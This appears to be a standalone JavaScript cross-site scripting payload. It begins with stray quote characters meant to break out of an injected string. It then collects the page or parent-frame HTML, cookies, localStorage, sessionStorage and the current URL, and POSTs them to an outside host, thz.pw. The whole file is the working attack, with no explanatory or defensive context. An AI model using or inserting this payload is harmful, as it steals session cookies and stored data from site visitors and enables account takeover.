'
'
var c,l,s;
function gb123(w) { return w.document.documentElement ? w.document.documentElement.innerHTML : (w.document.body && w.document.body.parentNode ? w.document.body.parentNode.innerHTML : ( w.document.body ? w.document.body.innerHTML : '')) };
var str = gb123(window);
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {
}
}
var lh=location.href;
if(lh=='about:blank') {
try { lh = parent.location.href; str = gb123(parent); } catch(e) {}
}
try{
c=document.cookie
l=localStorage;
s=sessionStorage;
}catch(e){c='';l='';s=''}
xhttp.open("POST", "https://thz.pw", true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.send("d="+escape(str)+'&c='+escape(c)+'&l='+escape(lh)+'&s='+escape(JSON.stringify(l))+'&e='+escape(JSON.stringify(s)));